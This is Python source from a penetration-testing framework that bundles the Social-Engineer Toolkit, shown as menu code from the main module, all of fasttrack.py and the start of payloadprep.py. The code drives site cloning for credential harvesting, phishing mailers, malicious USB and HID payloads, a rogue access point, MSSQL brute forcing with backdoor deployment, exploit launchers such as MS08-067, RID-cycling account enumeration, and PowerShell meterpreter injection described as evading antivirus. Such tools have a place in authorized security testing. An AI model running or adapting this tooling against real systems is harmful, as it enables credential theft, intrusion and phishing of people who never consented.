me, "importing 'src.webattack.harvester.harvester'", 1)
try:
module_reload(harvester)
except:
import harvester
# multi_attack vector here
if attack_vector == "multiattack":
sys.path.append(
definepath + "/src/webattack/multi_attack/")
debug_msg(
me, "importing 'src.webattack.multi_attack.multiattack'", 1)
try:
module_reload(multiattack)
except:
import multiattack
# if we arent using credential harvester or
# tabnabbing
if attack_vector != "harvester":
if attack_vector != "tabnabbing":
if attack_vector != "multiattack":
if attack_vector != "webjacking":
if attack_vector != "hta":
sys.path.append(
definepath + "/src/html")
debug_msg(
me, "importing 'src.html.spawn'", 1)
try:
module_reload(spawn)
except:
import spawn
# Import your own site
if choice3 == '3':
sys.path.append(
definepath + "/src/webattack/web_clone/")
if os.path.isfile(userconfigpath + "site.template"):
os.remove(userconfigpath + "site.template")
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=SELF")
# specify the site to clone
if not os.path.isdir(userconfigpath + "web_clone"):
os.makedirs(userconfigpath + "web_clone")
print_warning(
"Example: /home/website/ (make sure you end with /)")
print_warning(
"Also note that there MUST be an index.html in the folder you point to.")
URL = raw_input(
setprompt(["2"], "Path to the website to be cloned"))
if not URL.endswith("/"):
if not URL.endswith("index.html"):
URL = URL + "/"
if not os.path.isfile(URL + "index.html"):
if os.path.isfile(URL):
shutil.copyfile(
"%s" % (URL), userconfigpath + "web_clone/index.html")
if not os.path.isfile(URL):
if URL.endswith("index.html"):
shutil.copyfile(
URL, "%s/web_clone/index.html" % (userconfigpath))
else:
print_error("ERROR:index.html not found!!")
print_error(
"ERROR:Did you just put the path in, not file?")
print_error(
"Exiting the Social-Engineer Toolkit...Hack the Gibson.\n")
exit_set()
if os.path.isfile(URL + "index.html"):
print_status(
"Index.html found. Do you want to copy the entire folder or just index.html?")
choice = raw_input(
"\n1. Copy just the index.html\n2. Copy the entire folder\n\nEnter choice [1/2]: ")
if choice == "1" or choice == "":
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
os.remove("%s/web_clone/index.html" % (userconfigpath))
shutil.copyfile(URL + "index.html", "%s/web_clone/index.html" % (userconfigpath))
if choice == "2":
if os.path.isdir(URL + "src/webattack"):
print_error("You cannot specify a folder in the default SET path. This goes into a loop Try something different.")
URL = raw_input("Enter the folder to import into SET, this CANNOT be the SET directory: ")
if os.path.isdir(URL + "src/webattack" % (URL)):
print_error("You tried the same thing. Exiting now.")
sys.exit()
copyfolder(URL, "%s/web_clone/" % userconfigpath)
filewrite.write("\nURL=%s" % (URL))
filewrite.close()
# if not harvester then load up cloner
if attack_vector == "java" or attack_vector == "browser":
# import our website cloner
debug_msg(
me, "importing 'src.webattack.web_clone.cloner'", 1)
import src.webattack.web_clone.cloner
# launch HTA attack vector after the website has been
# cloned
if attack_vector == "hta":
# launch HTA attack vector after the website has
# been cloned
from src.webattack.hta.main import *
# update config
update_options("ATTACK_VECTOR=HTA")
gen_hta_cool_stuff()
attack_vector = "hta"
print_status(
"Automatically starting Apache for you...")
subprocess.Popen(
"service apache2 start", shell=True).wait()
# if java applet attack
if attack_vector == "java":
# import our payload generator
debug_msg(
me, "importing 'src.core.payloadgen.create_payloads'", 1)
import src.core.payloadgen.create_payloads
# grab browser exploit selection
if attack_vector == "browser":
# grab clientattack
sys.path.append(
definepath + "/src/webattack/browser_exploits")
debug_msg(
me, "importing 'src.webattack.browser_exploits.gen_payload'", 1)
try:
module_reload(gen_payload)
except:
import gen_payload
# arp cache if applicable
sys.path.append(definepath + "/src/core/arp_cache")
debug_msg(
me, "line 592: importing 'src.core.arp_cache.arp'", 1)
try:
module_reload(arp)
except:
import arp
# if not harvester spawn server
if attack_vector == "java" or attack_vector == "browser":
# import web_server and do magic
sys.path.append(definepath + "/src/html")
debug_msg(me, "importing 'src.html.spawn'", 1)
try:
module_reload(spawn)
except:
import spawn
# cred harvester for auto site here
if attack_vector == "harvester":
# get the url
print_info("Example: http://www.blah.com")
URL = raw_input(
setprompt(["2"], "URL of the website you imported"))
match = re.search("http://", URL)
match1 = re.search("https://", URL)
if not match:
if not match1:
URL = ("http://" + URL)
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("\nURL=%s" % (URL))
filewrite.close()
# start web cred harvester here
sys.path.append(
definepath + "/src/webattack/harvester")
debug_msg(
me, "importing 'src.webattack.harvester.harvester'", 1)
try:
module_reload(harvester)
except:
import harvester
# tabnabbing for auto site here
if attack_vector == "tabnabbing" or attack_vector == "webjacking":
# get the url
print_info("Example: http://www.blah.com")
URL = raw_input(
setprompt(["2"], "URL of the website you imported"))
match = re.search("http://", URL)
match1 = re.search("https://", URL)
if not match:
if not match1:
URL = ("http://" + URL)
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("\nURL=%s" % (URL))
filewrite.close()
# start tabnabbing here
sys.path.append(
definepath + "/src/webattack/tabnabbing")
debug_msg(
me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
try:
module_reload(tabnabbing)
except:
import tabnabbing
# start web cred harvester here
sys.path.append(
definepath + "/src/webattack/harvester")
debug_msg(
me, "importing 'src.webattack.harvester.harvester'", 1)
try:
module_reload(harvester)
except:
import harvester
# multi attack vector here
if attack_vector == "multiattack":
try:
filewrite = open(
"src/progam_junk/multiattack.template", "w")
filewrite.write("TEMPLATE=TRUE")
filewrite.close()
except:
pass
debug_msg(
me, "importing 'src.webattack.multi_attack.multiattack'", 1)
import src.webattack.multi_attack.multiattack
# Return to main menu
if choice3 == '4':
print (" Returning to main menu.\n")
break
except KeyboardInterrupt:
print(
" Control-C detected, bombing out to previous menu..")
break
# Define Auto-Infection USB/CD Method here
if main_menu_choice == '3':
#
# USER INPUT: SHOW INFECTIOUS MEDIA MENU #
#
# Main Menu choice 3: Infectious Media Generator
debug_msg(me, "printing 'text.infectious_menu'", 5)
show_infectious_menu = create_menu(
text.infectious_text, text.infectious_menu)
infectious_menu_choice = raw_input(setprompt(["3"], ""))
if infectious_menu_choice == 'exit':
exit_set()
if infectious_menu_choice == "0":
menu_back()
if infectious_menu_choice == "":
infectious_menu_choice = "1"
# if fileformat
if infectious_menu_choice == "1":
ipaddr = raw_input(
setprompt(["3"], "IP address for the reverse connection (payload)"))
update_options("IPADDR=" + ipaddr)
filewrite1 = open(userconfigpath + "payloadgen", "w")
filewrite1.write("payloadgen=solo")
filewrite1.close()
# if choice is file-format
if infectious_menu_choice == "1":
filewrite = open(userconfigpath + "fileformat.file", "w")
filewrite.write("fileformat=on")
filewrite.close()
sys.path.append(definepath + "/src/core/msf_attacks/")
debug_msg(
me, "importing 'src.core.msf_attacks.create_payload'", 1)
try:
module_reload(create_payload)
except:
import create_payload
# if choice is standard payload
if infectious_menu_choice == "2":
# trigger set options for infectious media
update_options("INFECTION_MEDIA=ON")
try:
import src.core.payloadgen.solo
except:
module_reload(src.core.payloadgen.solo)
# if we aren't exiting, then launch autorun
if infectious_menu_choice != "0":
try:
import src.autorun.autolaunch
except:
module_reload(src.autorun.autolaunch)
#
#
# Main Menu choice 4: Create a Payload and Listener
#
#
if main_menu_choice == '4':
update_options("PAYLOADGEN=SOLO")
import src.core.payloadgen.solo
# try: import src.core.payloadgen.solo
# except: module_reload(src.core.payloadgen.solo)
# if the set payload is there
if os.path.isfile(userconfigpath + "msf.exe"):
shutil.copyfile(userconfigpath + "msf.exe", "payload.exe")
return_continue()
# Main Menu choice 5: Mass Mailer Attack
if main_menu_choice == '5':
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_web'", 1)
try:
module_reload(src.phishing.smtp.client.smtp_web)
except:
import src.phishing.smtp.client.smtp_web
# Main Menu choice 6: Teensy USB HID Attack Vector
if main_menu_choice == '6':
#
# USER INPUT: SHOW TEENSY MENU #
#
debug_msg(me, "printing 'text.teensy_menu'", 5)
show_teensy_menu = create_menu(text.teensy_text, text.teensy_menu)
teensy_menu_choice = raw_input(setprompt(["6"], ""))
if teensy_menu_choice == 'exit':
exit_set()
# if not return to main menu
yes_or_no = ''
if teensy_menu_choice != "0":
# set our teensy info file in program junk
filewrite = open(userconfigpath + "teensy", "w")
filewrite.write(teensy_menu_choice + "\n")
if teensy_menu_choice != "3" and teensy_menu_choice != "7" and teensy_menu_choice != "8" and teensy_menu_choice != "9" and teensy_menu_choice != "10" and teensy_menu_choice != "11" and teensy_menu_choice != "12" and teensy_menu_choice != "13" and teensy_menu_choice != "14":
yes_or_no = yesno_prompt(
"0", "Do you want to create a payload and listener [yes|no]: ")
if yes_or_no == "YES":
filewrite.write("payload")
filewrite.close()
# load a payload
sys.path.append(definepath + "/src/core/payloadgen")
debug_msg(
me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
module_reload(create_payloads)
except:
import create_payloads
if yes_or_no == "NO":
filewrite.close()
# need these default files for web server load
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=CUSTOM")
filewrite.close()
filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("hid")
filewrite.close()
# if we are doing binary2teensy
if teensy_menu_choice != "7" and teensy_menu_choice != "8" and teensy_menu_choice != "9" and teensy_menu_choice != "10" and teensy_menu_choice != "11" and teensy_menu_choice != "12" and teensy_menu_choice != "14":
sys.path.append(definepath + "/src/teensy")
debug_msg(me, "importing 'src.teensy.teensy'", 1)
try:
module_reload(teensy)
except:
import teensy
if teensy_menu_choice == "7":
debug_msg(me, "importing 'src.teensy.binary2teensy'", 1)
import src.teensy.binary2teensy
# if we are doing sd2teensy attack
if teensy_menu_choice == "8":
debug_msg(me, "importing 'src.teensy.sd2teensy'", 1)
import src.teensy.sd2teensy
# if we are doing the sd2teensy osx attack
if teensy_menu_choice == "9":
print_status(
"Generating the SD2Teensy OSX ino file for you...")
if not os.path.isdir(userconfigpath + "reports/osx_sd2teensy"):
os.makedirs(userconfigpath + "reports/osx_sd2teensy")
shutil.copyfile("src/teensy/osx_sd2teensy.ino",
"%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (userconfigpath))
print_status(
"File has been exported to ~/.set/reports/osx_sd2teensy/osx_sd2teensy.ino")
return_continue()
# if we are doing the X10 Arduino Sniffer
if teensy_menu_choice == "10":
print_status(
"Generating the Arduino sniffer and libraries ino..")
if not os.path.isdir(userconfigpath + "reports/arduino_sniffer"):
os.makedirs(userconfigpath + "reports/arduino_sniffer")
shutil.copyfile("src/teensy/x10/x10_sniffer.ino",
userconfigpath + "reports/arduino_sniffer/x10_sniffer.ino")
shutil.copyfile("src/teensy/x10/libraries.zip",
userconfigpath + "reports/arduino_sniffer/libraries.zip")
print_status(
"Arduino sniffer files and libraries exported to ~/.set/reports/arduino_sniffer")
return_continue()
# if we are doing the X10 Jammer
if teensy_menu_choice == "11":
print_status(
"Generating the Arduino jammer ino and libraries...")
if not os.path.isdir(userconfigpath + "reports/arduino_jammer"):
os.makedirs(userconfigpath + "reports/arduino_jammer")
shutil.copyfile("src/teensy/x10/x10_blackout.ino",
userconfigpath + "reports/arduino_jammer/x10_blackout.ino")
shutil.copyfile("src/teensy/x10/libraries.zip",
userconfigpath + "reports/arduino_jammer/libraries.zip")
print_status(
"Arduino jammer files and libraries exported to ~/.set/reports/arduino_jammer")
return_continue()
# powershell shellcode injection
if teensy_menu_choice == "12":
print_status(
"Generating the Powershell - Shellcode injection ino..")
debug_msg(
me, "importing 'src.teensy.powershell_shellcode'", 1)
import src.teensy.powershell_shellcode
# HID Msbuild compile to memory Shellcode Attack
if teensy_menu_choice == "14":
print_status(
"HID Msbuild compile to memory Shellcode Attack selected")
debug_msg(
me, "importing '-----file-----'", 1)
import src.teensy.ino_gen
if teensy_menu_choice == "0":
teensy_menu_choice = None
#
    # Main Menu choice 7: Wireless Access Point Attack Vector
#
if main_menu_choice == '7':
if operating_system == "windows":
print_warning(
"Sorry. The wireless attack vector is not yet supported in Windows.")
return_continue()
if operating_system != "windows":
# set path to nothing
airbase_path = ""
dnsspoof_path = ""
# need to pull the SET config file
fileopen = open("/etc/setoolkit/set.config", "r")
for line in fileopen:
line = line.rstrip()
match = re.search("AIRBASE_NG_PATH=", line)
if match:
airbase_path = line.replace("AIRBASE_NG_PATH=", "")
match1 = re.search("DNSSPOOF_PATH=", line)
if match1:
dnsspoof_path = line.replace("DNSSPOOF_PATH=", "")
if not os.path.isfile(airbase_path):
if not os.path.isfile("/usr/local/sbin/airbase-ng"):
print_warning(
"Warning airbase-ng was not detected on your system. Using one in SET.")
print_warning(
"If you experience issues, you should install airbase-ng on your system.")
print_warning(
"You can configure it through the set_config and point to airbase-ng.")
airbase_path = ("src/wireless/airbase-ng")
if os.path.isfile("/usr/local/sbin/airbase-ng"):
airbase_path = "/usr/local/sbin/airbase-ng"
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/local/sbin/dnsspoof"):
dnsspoof_path = "/usr/local/sbin/dnsspoof"
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
# if we can find airbase-ng
if os.path.isfile(airbase_path):
if os.path.isfile(dnsspoof_path):
# start the menu here
while 1:
#
# USER INPUT: SHOW WIRELESS MENU #
#
debug_msg(
me, "printing 'text.wireless_attack_menu'", 5)
show_wireless_menu = create_menu(
text.wireless_attack_text, text.wireless_attack_menu)
wireless_menu_choice = raw_input(
setprompt(["8"], ""))
# if we want to start access point
if wireless_menu_choice == "1":
sys.path.append(definepath + "/src/wireless/")
debug_msg(
me, "importing 'src.wireless.wifiattack'", 1)
try:
module_reload(wifiattack)
except:
import wifiattack
# if we want to stop the wifi attack
if wireless_menu_choice == "2":
sys.path.append(definepath + "/src/wireless/")
debug_msg(
me, "importing 'src.wireless.stop_wifiattack'", 1)
try:
module_reload(stop_wifiattack)
except:
import stop_wifiattack
# if we want to return to the main menu
if wireless_menu_choice == "0":
print (" [*] Returning to the main menu ...")
break
if not os.path.isfile(dnsspoof_path):
if not os.path.isfile("/usr/local/sbin/dnsspoof"):
print_error(
"ERROR:DNS Spoof was not detected. Check the set_config file.")
return_continue()
#
# END WIFI ATTACK MODULE
#
    # Main Menu choice 8: QRCode Generator
if main_menu_choice == '8':
try:
from PIL import Image, ImageDraw
from src.qrcode.qrgenerator import *
print("""
The QRCode Attack Vector will create a QRCode for you with whatever URL you want.
When you have the QRCode Generated, select an additional attack vector within SET and
deploy the QRCode to your victim. For example, generate a QRCode of the SET Java Applet
and send the QRCode via a mailer.
""")
url = raw_input(
"Enter the URL you want the QRCode to go to (0 to exit): ")
if url != "0":
# if the reports directory does not exist then create it
if not os.path.isdir("%s/reports" % (userconfigpath)):
os.makedirs("%s/reports" % (userconfigpath))
gen_qrcode(url)
return_continue()
except ImportError:
print_error(
"This module requires PIL (Or Pillow) and qrcode to work properly.")
print_error(
"Just do pip install Pillow; pip install qrcode")
print_error(
"Else refer to here for installation: http://pillow.readthedocs.io/en/3.3.x/installation.html")
return_continue()
# Main Menu choice 9: PowerShell Attacks
if main_menu_choice == '9':
try:
module_reload(src.powershell.powershell)
except:
import src.powershell.powershell
    # Main Menu choice 10: Third Party Modules
if main_menu_choice == '10':
sys.path.append(definepath + "/src/core")
debug_msg(me, "importing 'src.core.module_handler'", 1)
try:
module_reload(module_handler)
except:
import module_handler
# Main Menu choice 0: Exit the Social-Engineer Toolkit
if main_menu_choice == '0':
break
# handle keyboard interrupts
except KeyboardInterrupt:
print("\n\n Thank you for " + bcolors.RED + "shopping" + bcolors.ENDC +
" with the Social-Engineer Toolkit.\n\n Hack the Gibson...and remember...hugs are worth more than handshakes.\n")
| 58,101 | Python | .py | 1,042 | 31.09501 | 290 | 0.42949 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,838 | fasttrack.py | CHEGEBB_africana-framework/externals/set/src/core/fasttrack.py | #!/usr/bin/env python3
from src.core.setcore import *
from src.core.menu import text
import subprocess
from multiprocessing.dummy import Pool as ThreadPool
definepath = os.getcwd()
# Py2/3 compatibility: make both input() and raw_input() safe to call
try: input = raw_input
except NameError: raw_input = input
#
#
# Fast-Track Main options and interface menus
#
#
try:
while 1:
#
# USER INPUT: SHOW WEB ATTACK MENU #
#
create_menu(text.fasttrack_text, text.fasttrack_menu)
attack_vector = raw_input(setprompt(["19"], ""))
if attack_vector == "0" or attack_vector == "quit" or attack_vector == "exit":
break
#
#
# mssql_scanner
#
#
if attack_vector == "1":
# start the menu
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
# take input here
attack_vector_sql = raw_input(setprompt(["19", "21"], ""))
#
# option 1 scan and attack, option 2 connect directly to mssql
# if 1, start scan and attack
#
if attack_vector_sql == '1':
print(
"\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n")
choice = raw_input(
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
if choice != "1":
if choice != "2":
if choice != "":
print_error(
"You did not specify 1 or 2! Please try again.")
choice = raw_input(
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
# grab ip address
if choice == "":
choice = "1"
if choice == "1":
range = raw_input(setprompt(
["19", "21", "22"], "Enter the CIDR, single IP, or multiple IPs seperated by space (ex. 192.168.1.1/24)"))
if choice == "2":
while 1:
range = raw_input(setprompt(
["19", "21", "22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
if not os.path.isfile(range):
print_error(
"File not found! Please type in the path to the file correctly.")
else:
break
if choice == "1":
port = "1433"
if choice == "2":
port = "1433"
# ask for a wordlist
wordlist = raw_input(setprompt(
["19", "21", "22"], "Enter path to a wordlist file [use default wordlist]"))
if wordlist == "":
wordlist = "default"
# specify the user to brute force
username = raw_input(setprompt(
["19", "21", "22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
# default to sa
if username == "":
username = "sa"
if username != "sa":
if not os.path.isfile(username):
print_status(
"If you were using a file, its not found, using text as username.")
# import the mssql module from fasttrack
from src.fasttrack import mssql
# choice from earlier if we want to use a filelist or whatnot
if choice != "2":
# sql_servers
sql_servers = ''
print_status("Hunting for SQL servers.. This may take a little bit.")
if "/" or " " in str(range):
if "/" in str(range):
iprange = printCIDR(range)
iprange = iprange.split(",")
pool = ThreadPool(200)
sqlport = pool.map(get_sql_port, iprange)
pool.close()
pool.join()
for sql in sqlport:
if sql != None:
if sql != "":
sql_servers = sql_servers + sql + ","
else:
range1 = range.split(" ")
for ip in range1:
sqlport = get_sql_port(ip)
if sqlport != None:
if sqlport != "":
sql_servers = sql_servers + sqlport + ","
else:
# use udp discovery to get the SQL server UDP 1434
sqlport = get_sql_port(range)
# if its not closed then check nmap - if both fail then
# nada
if sqlport != None:
if sqlport != "":
sql_servers = sqlport + ","
# specify choice 2
if choice == "2":
if not os.path.isfile(range):
while 1:
print_warning(
"Sorry boss. The file was not found. Try again")
range = raw_input(setprompt(
["19", "21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
if os.path.isfile(range):
print_status(
"Atta boy. Found the file this time. Moving on.")
break
fileopen = open(range, "r").readlines()
sql_servers = ""
for line in fileopen:
line = line.rstrip()
sql_servers = sql_servers + line + ","
# this will hold all of the SQL servers eventually
master_list = ""
# set a base counter
counter = 0
# if we specified a username list
if os.path.isfile(username):
usernames = open(username, "r")
if sql_servers != False:
# get rid of extra data from port scanner
sql_servers = sql_servers.replace(":%s OPEN" % (port), "")
# split into tuple for different IP address
sql_servers = sql_servers.split(",")
# start loop and brute force
print_status("The following SQL servers and associated ports were identified:\n")
for sql in sql_servers:
if sql != "":
print(sql)
if len(sql_servers) > 2:
print_status("By pressing enter, you will begin the brute force process on all SQL accounts identified in the list above.")
test = input("Press {enter} to begin the brute force process.")
for servers in sql_servers:
# this will return the following format ipaddr + "," +
# username + "," + str(port) + "," + passwords
if servers != "":
# if we aren't using a username file
if not os.path.isfile(username):
sql_success = mssql.brute(
servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break
# into this to the above with a newline to
# be parsed later
master_list = master_list + \
sql_success + ":"
counter = 1
# if we specified a username list
if os.path.isfile(username):
for users in usernames:
users = users.rstrip()
sql_success = mssql.brute(
servers, users, port, wordlist)
                            # we won't break out of the loop here in case
                            # there are multiple usernames we want to find
if sql_success != False:
master_list = master_list + \
sql_success + ":"
counter = 1
# if we didn't successful attack one
if counter == 0:
if sql_servers:
print_warning(
"Sorry. Unable to locate or fully compromise a MSSQL Server on the following SQL servers: ")
else:
print_warning(
"Sorry. Unable to find any SQL servers to attack.")
pause = raw_input(
"Press {return} to continue to the main menu.")
# if we successfully attacked one
if counter == 1:
# need to loop to keep menu going
while 1:
# set a counter to show compromised servers
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
print_status(
"SET Fast-Track attacked the following SQL servers: ")
for line in sql_servers:
if line != "":
print("SQL Servers: " + line.rstrip())
print_status(
"Below are the successfully compromised systems.\nSelect the compromise SQL server you want to interact with:\n")
for success in master_names:
if success != "":
success = success.rstrip()
success = success.split(",")
success = bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[
3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
print(" " + str(counter) + ". " + success)
# increment counter
counter = counter + 1
print("\n 0. Return back to the main menu.\n")
# select the server to interact with
select_server = raw_input(
setprompt(["19", "21", "22"], "Select the SQL server to interact with [1]"))
# default 1
if select_server == "quit" or select_server == "exit":
break
if select_server == "":
select_server = "1"
if select_server == "0":
break
counter = 1
for success in master_names:
if success != "":
success = success.rstrip()
success = success.split(",")
# if we equal the number used above
if counter == int(select_server):
# ipaddr + "," + username + "," + str(port) +
# "," + passwords
print(
"\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 0. Return back to the main menu.\n")
option = raw_input(
setprompt(["19", "21", "22"], "Which deployment option do you want [1]"))
if option == "":
option = "1"
# if 0 then break
if option == "0":
break
# specify we are using the fasttrack
# option, this disables some features
filewrite = open(
userconfigpath + "fasttrack.options", "w")
filewrite.write("none")
filewrite.close()
# import fasttrack
if option == "1":
# import payloads for selection and
# prep
mssql.deploy_hex2binary(
success[0], success[2], success[1], success[3])
# straight up connect
if option == "2":
mssql.cmdshell(success[0], success[2], success[
1], success[3], option)
# increment counter
counter = counter + 1
#
# if we want to connect directly to a SQL server
#
if attack_vector_sql == "2":
sql_server = raw_input(setprompt(
["19", "21", "23"], "Enter the hostname or IP address of the SQL server"))
sql_port = raw_input(
setprompt(["19", "21", "23"], "Enter the SQL port to connect [1433]"))
if sql_port == "":
sql_port = "1433"
sql_username = raw_input(
setprompt(["19", "21", "23"], "Enter the username of the SQL Server [sa]"))
# default to sa
if sql_username == "":
sql_username = "sa"
sql_password = raw_input(
setprompt(["19", "21", "23"], "Enter the password for the SQL server"))
print_status("Connecting to the SQL server...")
# try connecting
# establish base counter for connection
counter = 0
try:
import _mssql
conn = _mssql.connect(
sql_server + ":" + str(sql_port), sql_username, sql_password)
counter = 1
except Exception as e:
print(e)
print_error("Connection to SQL Server failed. Try again.")
# if we had a successful connection
if counter == 1:
print_status(
"Dropping into a SQL shell. Type quit to exit.")
# loop forever
while 1:
# enter the sql command
sql_shell = raw_input("Enter your SQL command here: ")
if sql_shell == "quit" or sql_shell == "exit":
print_status(
"Exiting the SQL shell and returning to menu.")
break
try:
# execute the query
sql_query = conn.execute_query(sql_shell)
# return results
print("\n")
for data in conn:
data = str(data)
data = data.replace("\\n\\t", "\n")
data = data.replace("\\n", "\n")
data = data.replace("{0: '", "")
data = data.replace("'}", "")
print(data)
except Exception as e:
print_warning(
"\nIncorrect syntax somewhere. Printing error message: " + str(e))
#
#
# exploits menu
#
#
if attack_vector == "2":
# start the menu
create_menu(text.fasttrack_exploits_text1,
text.fasttrack_exploits_menu1)
# enter the exploits menu here
range = raw_input(
setprompt(["19", "24"], "Select the number of the exploit you want"))
# ms08067
if range == "1":
try:
module_reload(src.fasttrack.exploits.ms08067)
except:
import src.fasttrack.exploits.ms08067
# firefox 3.6.16
if range == "2":
try:
module_reload(src.fasttrack.exploits.firefox_3_6_16)
except:
import src.fasttrack.exploits.firefox_3_6_16
# solarwinds
if range == "3":
try:
module_reload(src.fasttrack.exploits.solarwinds)
except:
import src.fasttrack.exploits.solarwinds
# rdp DoS
if range == "4":
try:
module_reload(src.fasttrack.exploits.rdpdos)
except:
import src.fasttrack.exploits.rdpdos
if range == "5":
try:
module_reload(src.fasttrack.exploits.mysql_bypass)
except:
import src.fasttrack.exploits.mysql_bypass
if range == "6":
try:
module_reload(src.fasttrack.exploits.f5)
except:
import src.fasttrack.exploits.f5
#
#
# sccm attack menu
#
#
if attack_vector == "3":
# load sccm attack
try:
module_reload(src.fasttrack.sccm.sccm_main)
except:
import src.fasttrack.sccm.sccm_main
#
#
# dell drac default credential checker
#
#
if attack_vector == "4":
# load drac menu
subprocess.Popen("python3 %s/src/fasttrack/delldrac.py" %
(definepath), shell=True).wait()
#
#
# RID ENUM USER ENUMERATION
#
#
if attack_vector == "5":
print (""".______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
| |\ \----.| | | '--' | | |____ | |\ | | `--' | | | | |
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
""")
print(
"\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want.")
print("\n")
ipaddr = raw_input(
setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
if ipaddr == "0" or ipaddr == "quit" or ipaddr == "exit":
break
print_status(
"Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
dict = raw_input(setprompt(
["31"], "Enter path to dictionary file to brute force [enter for built in]"))
# if we are using the built in one
if dict == "":
# write out a file
filewrite = open(userconfigpath + "dictionary.txt", "w")
filewrite.write("\nPassword1\nPassword!\nlc username")
# specify the path
dict = userconfigpath + "dictionary.txt"
filewrite.close()
# if we are not brute forcing
if dict.lower() == "no":
print_status("No problem, not brute forcing user accounts")
dict = ""
if dict != "":
print_warning(
"You are about to brute force user accounts, be careful for lockouts.")
choice = raw_input(
setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
if choice.lower() == "n" or choice.lower() == "no":
print_status(
"Okay. Not brute forcing user accounts *phew*.")
dict = ""
# next we see what rid we want to start
start_rid = raw_input(
setprompt(["31"], "What RID do you want to start at [500]"))
if start_rid == "":
start_rid = "500"
# stop rid
stop_rid = raw_input(
setprompt(["31"], "What RID do you want to stop at [15000]"))
if stop_rid == "":
stop_rid = "15000"
print_status(
"Launching RID_ENUM to start enumerating user accounts...")
subprocess.Popen("python3 src/fasttrack/ridenum.py %s %s %s %s" %
(ipaddr, start_rid, stop_rid, dict), shell=True).wait()
# once we are finished, prompt.
print_status("Everything is finished!")
pause = raw_input("Press {return} to go back to the main menu.")
#
#
# PSEXEC PowerShell
#
#
if attack_vector == "6":
print(
"\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n")
try:
module_reload(src.fasttrack.psexec)
except:
import src.fasttrack.psexec
# handle keyboard exceptions
except KeyboardInterrupt:
pass
| 23,819 | Python | .py | 461 | 30.498915 | 468 | 0.422991 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,839 | payloadprep.py | CHEGEBB_africana-framework/externals/set/src/core/payloadprep.py | #!/usr/bin/env python3
############################################
# Code behind the SET interactive shell and RATTE
############################################
import os
import sys
import subprocess
import re
import shutil
import time
from src.core.setcore import *
definepath = os.getcwd()
sys.path.append(definepath)
# grab operating system
operating_system = check_os()
# check the config file
fileopen = open("/etc/setoolkit/set.config", "r")
for line in fileopen:
line = line.rstrip()
# define if we use upx encoding or not
match = re.search("UPX_ENCODE=", line)
if match:
upx_encode = line.replace("UPX_ENCODE=", "")
# set the upx flag
match1 = re.search("UPX_PATH=", line)
if match1:
upx_path = line.replace("UPX_PATH=", "")
if upx_encode == "ON":
if not os.path.isfile(upx_path):
if operating_system != "windows":
print_warning(
"UPX packer not found in the pathname specified in config. Disabling UPX packing for executable")
upx_encode == "OFF"
# if we removed the set shells to free up space, needed for pwniexpress
match2 = re.search("SET_INTERACTIVE_SHELL=", line)
if match2:
line = line.replace("SET_INTERACTIVE_SHELL=", "").lower()
if line == "off":
sys.exit(
"\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config")
# make directory if it's not there
if not os.path.isdir(userconfigpath + "web_clone/"):
os.makedirs(userconfigpath + "web_clone/")
# grab ip address and SET web server interface
if os.path.isfile(userconfigpath + "interface"):
fileopen = open(userconfigpath + "interface", "r")
for line in fileopen:
ipaddr = line.rstrip()
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(
setprompt("0", "IP address to connect back on for the reverse listener"))
update_options("IPADDR=" + ipaddr)
